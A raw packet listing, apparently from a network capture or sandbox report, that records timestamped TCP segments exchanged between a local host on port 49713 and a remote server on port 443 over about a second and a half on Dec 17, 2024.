                                                                                    Dec 17, 2024 08:38:42.485951900 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.493197918 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.493216991 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.493263960 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.493273973 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.493320942 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.493320942 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.634816885 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.634840965 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.634896040 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.634919882 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.634989023 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.634989023 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.642071962 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.642088890 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.642183065 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.642199993 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.642647982 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.649732113 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.649751902 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.650171041 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.650182962 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.650672913 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.656068087 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.656091928 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.656176090 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.656186104 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.656239033 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.664038897 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.664061069 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.664208889 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.664222956 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.666851044 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.670607090 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.670624971 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.670743942 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.670753956 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.670953035 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.678018093 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.678034067 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.678139925 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.678148985 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.678318024 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.685451031 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.685477972 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.685600042 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.685600042 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.685610056 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.685688972 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.830162048 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.830193043 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.830306053 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.830306053 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.830319881 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.830408096 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.834218979 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.834238052 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.834295988 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.834309101 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.834352970 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.834352970 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.846177101 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.846200943 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.846252918 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.846261024 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.846422911 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.848361015 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.848380089 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.848434925 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.848445892 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.848488092 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.848488092 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.856050014 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.856075048 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.856167078 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.856167078 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.856178999 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.856237888 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.862462997 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.862479925 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.862572908 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.862584114 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.862641096 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.870022058 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.870040894 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.870094061 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.870101929 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.870145082 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.877415895 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.877430916 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.877491951 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:42.877501965 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:42.877532959 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.018660069 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.018685102 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.018768072 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.018779993 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.018809080 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.018826008 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.026395082 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.026412010 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.026557922 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.026567936 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.026762962 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.033585072 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.033602953 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.033695936 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.033695936 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.033708096 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.033870935 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.041093111 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.041110992 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.041158915 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.041167974 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.041177034 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.041223049 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.048103094 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.048119068 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.048202991 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.048212051 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.048275948 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.054600954 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.054616928 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.054721117 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.054729939 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.054788113 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.062133074 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.062150955 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.062187910 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.062196970 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.062230110 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.062349081 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.069539070 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.069566965 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.069638968 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.069648027 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.069696903 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.211301088 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.211364985 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.211416006 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.211430073 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.211486101 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.211486101 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.218720913 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.218739033 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.218884945 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.218894958 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.219141006 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.225296974 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.225312948 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.225400925 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.225416899 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.225671053 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.232763052 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.232780933 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.232881069 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.232881069 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.232888937 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.233025074 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.240174055 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.240190029 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.240266085 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.240274906 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.240396023 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.247158051 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.247176886 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.247271061 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.247278929 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.247329950 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.247329950 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.254679918 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.254703999 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.254861116 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.254861116 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.254870892 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.255111933 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.261152983 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.261171103 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.261322975 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.261322975 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.261331081 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.261425972 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.403776884 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.403805017 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.403887033 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.403908014 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.404098988 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.410363913 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.410382986 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.410500050 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.410550117 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.411017895 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.417679071 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.417699099 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.417792082 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.417815924 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.417982101 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.425168037 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.425189972 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.425273895 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.425273895 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.425287962 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.425477982 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.431725979 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.431746960 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.431842089 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.431842089 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.431854963 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.432195902 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.439734936 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.439759970 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.439963102 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.439963102 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.439970970 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.440026999 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.446214914 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.446233034 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.446302891 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.446310043 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.446357965 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.446417093 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.453584909 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.453604937 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.453684092 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.453691006 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.453722954 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.453814983 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.595740080 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.595767975 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.595834017 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.595849037 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.599636078 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.602226019 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.602247000 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.602432966 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.602451086 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.602662086 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.609683990 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.609704018 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.610013008 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.610013008 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.610033989 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.610619068 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.617135048 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.617153883 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.617243052 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.617271900 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.617492914 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.623641968 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.623661041 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.623796940 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.623796940 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.623811007 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.623989105 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.631587029 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.631607056 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.632100105 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.632117033 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.632297993 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.638185978 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.638206005 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.639633894 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.639652967 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.639909983 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.645685911 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.645709038 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.645843029 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.645843029 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.645859003 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.647628069 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.787410975 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.787440062 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.787552118 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.787564039 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.787599087 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.787723064 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.794703960 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.794720888 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.794950008 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.794960022 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.795110941 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.802213907 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.802232981 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.802359104 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.802367926 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.802509069 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.808779955 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.808794975 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.808933020 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.808944941 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.809139967 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.816245079 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.816267967 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.816344976 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.816354990 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.816504955 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.823370934 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.823400974 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.823633909 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.823643923 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.824103117 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.830681086 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.830705881 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.830750942 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.830766916 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.830871105 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.838165045 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.838197947 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.838277102 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.838277102 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.838289976 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.838356018 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.987174034 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.987209082 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.987256050 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.987272978 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.987332106 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.994549036 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.994579077 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.994707108 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.994707108 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:43.994716883 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:43.995191097 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.002006054 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.002026081 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.002088070 CET49713443192.168.2.10172.67.140.151
